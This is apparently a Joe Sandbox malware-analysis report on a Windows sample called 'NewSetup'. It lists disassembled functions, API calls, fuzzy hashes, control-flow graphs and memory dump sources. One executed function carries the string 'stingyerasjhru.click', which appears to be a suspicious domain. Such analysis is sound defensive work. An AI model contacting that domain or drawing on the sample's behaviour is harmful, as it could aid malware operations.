                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3493665558-3733052814
                                                                                                      • Opcode ID: a36174258e45852b36b22d8f2bea981464a965771cbb2b913c3666622ff9f2f2
                                                                                                      • Instruction ID: f68dab7a159670663104e1dc03a8d38a35b707b22b24a98db861540d252582a3
                                                                                                      • Opcode Fuzzy Hash: a36174258e45852b36b22d8f2bea981464a965771cbb2b913c3666622ff9f2f2
                                                                                                      • Instruction Fuzzy Hash: DE31D27642022AFBCF279FD0E8849AA7B6AFF08315B58465AF9540D122C336DD71DB81
                                                                                                      Function 0021B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021B8B9
                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?), ref: 0021B8DE
                                                                                                        • Part of subcall function 0022060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0021F354,03013B20,?,?,?,0021F354,00213D4A,0024759C,00213D4A), ref: 0022066D
                                                                                                        • Part of subcall function 00228353: IsProcessorFeaturePresent.KERNEL32(00000017,0022C224), ref: 0022836F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1924019822-1018135373
                                                                                                      • Opcode ID: b84095dd777531a7db53ba3a33df79e42f392d7cb47444ad99682c73d07c829f
                                                                                                      • Instruction ID: 4414103db8ab9109e5674e83c194ad14145070d036953b8c8fdd91ab5061b321
                                                                                                      • Opcode Fuzzy Hash: b84095dd777531a7db53ba3a33df79e42f392d7cb47444ad99682c73d07c829f
                                                                                                      • Instruction Fuzzy Hash: B421AF31D20219EBCF26DF95D849AEEB7F9AF64B10F160409E405AB250CB70ADA5CB91
                                                                                                      Function 0021B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00212673
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___std_exception_copy
                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                      • API String ID: 2659868963-1158432155
                                                                                                      • Opcode ID: 3b774e44a817ec3f54ae36044c3ea16b17335371b66309c4cc20c47a5483f354
                                                                                                      • Instruction ID: 7f10f873d3f112166a5bf5d80fc9fd7cfc5539585557a0bf292b39ede4b3e46c
                                                                                                      • Opcode Fuzzy Hash: 3b774e44a817ec3f54ae36044c3ea16b17335371b66309c4cc20c47a5483f354
                                                                                                      • Instruction Fuzzy Hash: C601D4F1528301ABDB08DF28E855A5A7BE8AF08718F01881CF45D8B341D375E868CB81
                                                                                                      Function 00212610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0021F354,03013B20,?,?,?,0021F354,00213D4A,0024759C,00213D4A), ref: 0022066D
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00212673
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: bad array new length$ios_base::badbit set
                                                                                                      • API String ID: 3109751735-1158432155
                                                                                                      • Opcode ID: 9239c4bcd6d626e3ed7962430c8bf86f9f701b67dd809284f0e8979666e001a4
                                                                                                      • Instruction ID: dd9911f4d63efadef56f0d0dddefa71053d63c83e6c512b7432ae42028786307
                                                                                                      • Opcode Fuzzy Hash: 9239c4bcd6d626e3ed7962430c8bf86f9f701b67dd809284f0e8979666e001a4
                                                                                                      • Instruction Fuzzy Hash: 33F0F8F1928310ABD704AF29E84974BBBE9EB45718F41881CF5989B301D3B5D468CF92

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.6%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:12
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 20575 40c830 CoInitializeEx 20570 40c865 CoInitializeSecurity 20571 43d1aa GetForegroundWindow 20572 43f030 20571->20572 20573 43d1b8 GetForegroundWindow 20572->20573 20574 43d1ce 20573->20574 20576 40e1fa 20577 4096a0 20576->20577 20578 40e206 CoUninitialize 20577->20578 20579 40e230 20578->20579 20580 40e642 CoUninitialize 20579->20580 20581 40e660 20580->20581

                                                                                                      Executed Functions

                                                                                                      Function 0040E1FA Relevance: 9.6, APIs: 2, Strings: 4, Instructions: 621COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 184 40e1fa-40e224 call 4096a0 CoUninitialize 187 40e230-40e270 184->187 187->187 188 40e272-40e28a 187->188 189 40e290-40e2d8 188->189 189->189 190 40e2da-40e337 189->190 191 40e340-40e364 190->191 191->191 192 40e366-40e377 191->192 193 40e379-40e387 192->193 194 40e39b-40e3a3 192->194 195 40e390-40e399 193->195 196 40e3a5-40e3a6 194->196 197 40e3bb-40e3c8 194->197 195->194 195->195 200 40e3b0-40e3b9 196->200 198 40e3ca-40e3d1 197->198 199 40e3eb-40e3f3 197->199 201 40e3e0-40e3e9 198->201 202 40e3f5-40e3f6 199->202 203 40e40b-40e415 199->203 200->197 200->200 201->199 201->201 204 40e400-40e409 202->204 205 40e417-40e41b 203->205 206 40e42b-40e437 203->206 204->203 204->204 207 40e420-40e429 205->207 208 40e451-40e57e 206->208 209 40e439-40e43b 206->209 207->206 207->207 211 40e580-40e5c3 208->211 210 40e440-40e44d 209->210 210->210 212 40e44f 210->212 211->211 213 40e5c5-40e5eb 211->213 212->208 214 40e5f0-40e602 213->214 214->214 215 40e604-40e65e call 40b750 call 4096a0 CoUninitialize 214->215 220 40e660-40e6a0 215->220 220->220 221 40e6a2-40e6ba 220->221 222 40e6c0-40e708 221->222 222->222 223 40e70a-40e767 222->223 224 40e770-40e794 223->224 224->224 225 40e796-40e7a7 224->225 226 40e7a9-40e7b7 225->226 227 40e7cb-40e7d3 225->227 228 40e7c0-40e7c9 226->228 229 40e7d5-40e7d6 227->229 230 40e7eb-40e7f8 227->230 228->227 228->228 233 40e7e0-40e7e9 229->233 231 40e7fa-40e801 230->231 232 40e81b-40e823 230->232 234 40e810-40e819 231->234 235 40e825-40e826 232->235 236 40e83b-40e845 232->236 233->230 233->233 234->232 234->234 237 40e830-40e839 235->237 238 40e847-40e84b 236->238 239 40e85b-40e867 236->239 237->236 237->237 240 40e850-40e859 238->240 241 40e881-40e99f 239->241 242 40e869-40e86b 239->242 240->239 240->240 244 40e9a0-40e9e3 241->244 243 40e870-40e87d 242->243 243->243 245 40e87f 243->245 244->244 246 40e9e5-40e9ff 244->246 245->241 247 40ea00-40ea12 246->247 247->247 248 40ea14-40ea60 call 40b750 247->248
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Uninitialize
                                                                                                      • String ID: Ds$]f$stingyerasjhru.click$}v
                                                                                                      • API String ID: 3861434553-3526389771
                                                                                                      • Opcode ID: 9c9c872ceee5d1727b78cb835495f79685d7af6cdecb67afa127824de112cc5a
                                                                                                      • Instruction ID: 28d4e5588af879f351e0c55689ec10c05792b3d9381e9559039d1688d12df22d
                                                                                                      • Opcode Fuzzy Hash: 9c9c872ceee5d1727b78cb835495f79685d7af6cdecb67afa127824de112cc5a
                                                                                                      • Instruction Fuzzy Hash: 1D12DEB154D3D18ED335CF2988907DBBFE1AFD2304F1989ADD8D86B252C6384906CB96
                                                                                                      Function 004269E0 Relevance: 2.9, Strings: 2, Instructions: 392COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 278 4269e0-4269f9 279 426a00-426a1e 278->279 279->279 280 426a20-426a2c 279->280 281 426a74-426a7f 280->281 282 426a2e-426a36 280->282 284 426a80-426a9e 281->284 283 426a40-426a47 282->283 286 426a50-426a56 283->286 287 426a49-426a4c 283->287 284->284 285 426aa0-426aa6 284->285 288 426aac-426ac6 call 43b460 285->288 289 426e1d-426e26 285->289 286->281 291 426a58-426a6c call 43cfa0 286->291 287->283 290 426a4e 287->290 296 426ad0-426aec 288->296 290->281 295 426a71 291->295 295->281 296->296 297 426aee-426afa 296->297 298 426b3f-426b43 297->298 299 426afc-426b04 297->299 301 426e14-426e1a call 43b4a0 298->301 302 426b49-426b52 298->302 300 426b10-426b17 299->300 305 426b20-426b26 300->305 306 426b19-426b1c 300->306 301->289 303 426b60-426b75 302->303 303->303 307 426b77-426b79 303->307 305->298 310 426b28-426b37 call 43cfa0 305->310 306->300 309 426b1e 306->309 311 426b80-426b8f call 408050 307->311 312 426b7b 307->312 309->298 315 426b3c 310->315 317 426bb0-426bba 311->317 312->311 315->298 318 426ba0-426bae 317->318 319 426bbc-426bbf 317->319 318->317 320 426bd3-426bdb 318->320 321 426bc0-426bcf 319->321 323 426be1-426bec 320->323 324 426e0b-426e11 call 408060 320->324 321->321 322 426bd1 321->322 322->318 326 426c3b-426c54 call 408050 323->326 327 426bee-426bf7 323->327 324->301 336 426c5a-426c60 326->336 337 426d7f-426da7 326->337 330 426c0c-426c10 327->330 331 426c12-426c1b 330->331 332 426c00 330->332 334 426c30-426c34 331->334 335 426c1d-426c20 331->335 338 426c01-426c0a 332->338 334->338 339 426c36-426c39 334->339 335->338 336->337 340 426c66-426c6c 336->340 341 426db0-426de2 337->341 338->326 338->330 339->338 342 426c70-426c7a 340->342 341->341 343 426de4-426e07 call 408ea0 call 408060 341->343 344 426c90-426c96 342->344 345 426c7c-426c82 342->345 343->324 348 426cc0-426ccc 344->348 349 426c98-426c9b 344->349 347 426d20-426d30 345->347 354 426d32-426d38 347->354 351 426d44-426d4c 348->351 352 426cce-426cd1 348->352 349->348 355 426c9d-426cb3 349->355 359 426d52-426d55 351->359 360 426d4e-426d50 351->360 352->351 356 426cd3-426d1f 352->356 354->337 358 426d3a-426d3c 354->358 355->347 356->347 358->342 361 426d42 358->361 362 426d57-426d79 359->362 363 426d7b-426d7d 359->363 360->354 361->337 362->347 363->347
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: $b%.$-,#"
                                                                                                      • API String ID: 2994545307-931030428
                                                                                                      • Opcode ID: 6a3802928c5f5a87aac56f19ec11622fc088211d542d43d856bad98c04f61c22
                                                                                                      • Instruction ID: eb0a7813bc495cb2fd809d80ca2ae1eeb419bef85b2bda93f64a55ce56aa5a2f
                                                                                                      • Opcode Fuzzy Hash: 6a3802928c5f5a87aac56f19ec11622fc088211d542d43d856bad98c04f61c22
                                                                                                      • Instruction Fuzzy Hash: 57B18A717083644BDB14DF24E8927BBB7A1EB91314F86853EE8858B381D63DDD05C39A
                                                                                                      Function 0043D929 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 461 43d929-43d93a 462 43d940-43d967 461->462 462->462 463 43d969-43d971 462->463 464 43d977-43d982 463->464 465 43d35f-43d36f 463->465 466 43d990-43d997 464->466 467 43d370-43d397 465->467 469 43d9a3-43d9a9 466->469 470 43d999-43d99c 466->470 467->467 468 43d399-43d3a6 467->468 471 43d3d9-43d3ed 468->471 472 43d3a8-43d3b3 468->472 469->465 474 43d9af-43d9b9 call 43cfa0 469->474 470->466 473 43d99e 470->473 471->461 476 43d3c0-43d3cd 472->476 473->465 477 43d9be-43d9c1 474->477 479 43d3cf 476->479 477->465 479->471
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: D]+\
                                                                                                      • API String ID: 2994545307-1174097187
                                                                                                      • Opcode ID: 2cfa3c311a0e9c01cd225743fa52a5313a8d1775c02606c88f75f1f7f84942d4
                                                                                                      • Instruction ID: 7572c7809211613d87147b95baac5cf25656afb3abccc1c11bb3482e60d05e20
                                                                                                      • Opcode Fuzzy Hash: 2cfa3c311a0e9c01cd225743fa52a5313a8d1775c02606c88f75f1f7f84942d4
                                                                                                      • Instruction Fuzzy Hash: 0321F579B0C3458FD754AF55E88013F77A3ABCA310F28A52ED9C243356C6745C069A1A
                                                                                                      Function 0043F080 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 484 43f080-43f09f 485 43f0a0-43f0a9 484->485 485->485 486 43f0ab-43f112 485->486 487 43f120-43f149 486->487 487->487 488 43f14b-43f156 487->488 489 43f195-43f19c 488->489 490 43f158-43f15a 488->490 491 43f160-43f168 490->491 492 43f171-43f177 491->492 493 43f16a-43f16d 491->493 492->489 495 43f179-43f18d call 43cfa0 492->495 493->491 494 43f16f 493->494 494->489 497 43f192 495->497 497->489
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: @
                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                      • Opcode ID: a472d10b5f9a7e5390908e9f8f6212d90e40df790a0c6070693bbc59db7dec30
                                                                                                      • Instruction ID: 46bd95ab95da14b092a617a80e557a72b18f969592b6fa2af1023528b8fd012f
                                                                                                      • Opcode Fuzzy Hash: a472d10b5f9a7e5390908e9f8f6212d90e40df790a0c6070693bbc59db7dec30
                                                                                                      • Instruction Fuzzy Hash: 593132725083048BCB14DF18E8816ABBBF5FB96320F10693DE5858B390E7359C08CB96
                                                                                                      Function 0043D1AA Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32 ref: 0043D1AA
                                                                                                      • GetForegroundWindow.USER32 ref: 0043D1C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ForegroundWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2020703349-0
                                                                                                      • Opcode ID: c4e5699213e8c8392b4d3a6b569e32cded55f0697a2c8afc432cfcaf34d365f3
                                                                                                      • Instruction ID: 3dbaf8c9d4b4cdac177c22d0d0fe4f5d6608661041d7d8772ec8f984dcac4e78
                                                                                                      • Opcode Fuzzy Hash: c4e5699213e8c8392b4d3a6b569e32cded55f0697a2c8afc432cfcaf34d365f3
                                                                                                      • Instruction Fuzzy Hash: ADD027FDD5310057C94C5B31ED1E41F36119B9B355714443DF40342372CD594807C54A
                                                                                                      Function 0040C865 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 409 40c865-40c89b CoInitializeSecurity
                                                                                                      APIs
                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C877
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeSecurity
                                                                                                      • String ID:
                                                                                                      • API String ID: 640775948-0
                                                                                                      • Opcode ID: 28478618b8bf013e95b7138ec7a52dc306bad92f05b26cb4ec7a7e52e234d450
                                                                                                      • Instruction ID: 1e3e2e598fd455d471313fdc32214382811b636f90739155dff12dd62cbeea8f
                                                                                                      • Opcode Fuzzy Hash: 28478618b8bf013e95b7138ec7a52dc306bad92f05b26cb4ec7a7e52e234d450
                                                                                                      • Instruction Fuzzy Hash: 97E05E79BC52047BF6284B18DD43F84220243C6B21F3D8224B310EE7D8CDF8A012420D
                                                                                                      Function 0040C830 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 410 40c830-40c861 CoInitializeEx
                                                                                                      APIs
                                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C843
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321984081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 9db20bcde595f6b808fc88834a66c7a984b9a00e406f242fa5d17b3b7a9d0ad7
                                                                                                      • Instruction ID: e5954fe18ae31227c9ebc57c7171ed4deaa3088f77e6c40460de058f9c649bee
                                                                                                      • Opcode Fuzzy Hash: 9db20bcde595f6b808fc88834a66c7a984b9a00e406f242fa5d17b3b7a9d0ad7
                                                                                                      • Instruction Fuzzy Hash: F2D05E256A41446BD348A76DAC46F2236989B87716F840239F252966D2E9506810C26A

                                                                                                      Non-executed Functions

                                                                                                      Function 00231287 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(00000000,?,0022E58D), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00228363), ref: 0022C210
                                                                                                      • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0023138F
                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002313CD
                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 002313E0
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00231428
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00231443
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                      • String ID: ,K$
                                                                                                      • API String ID: 415426439-3784840329
                                                                                                      • Opcode ID: c7be95c63bb6bc9c741948923d4437d3f4883f4f50c25e8ef63164949d9f5bf8
                                                                                                      • Instruction ID: 5b95c0d679e26cda28a9704b7f35eaebb26159667a6d840a939b8c488d665690
                                                                                                      • Opcode Fuzzy Hash: c7be95c63bb6bc9c741948923d4437d3f4883f4f50c25e8ef63164949d9f5bf8
                                                                                                      • Instruction Fuzzy Hash: 9D5171B1A20216ABDF10EFA5DC85ABE77B8FF09700F144469FA05E7190E7709A74CB61
                                                                                                      Function 00231A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,002313BD,00000002,00000000,?,?,?,002313BD,?,00000000), ref: 00231AA0
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,002313BD,00000002,00000000,?,?,?,002313BD,?,00000000), ref: 00231AC9
                                                                                                      • GetACP.KERNEL32(?,?,002313BD,?,00000000), ref: 00231ADE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      • Opcode ID: f1b2e8fa678b2577f55673386be907556e972469d4d7b49965497b18044f3758
                                                                                                      • Instruction ID: 951cd5ad9889f300755748124baa1fd8807fdd59332a71b85a7f307f65e2c015
                                                                                                      • Opcode Fuzzy Hash: f1b2e8fa678b2577f55673386be907556e972469d4d7b49965497b18044f3758
                                                                                                      • Instruction Fuzzy Hash: 7921C8A2B32102ABD734CF54C904A9773AAEF55F56F568425E94AD7200EB32DD70C390
                                                                                                      Function 00211FB0 Relevance: 7.7, APIs: 5, Instructions: 200fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00211240: _strlen.LIBCMT ref: 002112BA
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00212046
                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0021206B
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0021207A
                                                                                                      • _strlen.LIBCMT ref: 002120CD
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 002121FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 1490117831-0
                                                                                                      • Opcode ID: 47623733fa7ee54ee4fdf86bb6e208f8f51ec27f6a21ac6655cceb4ffd88667f
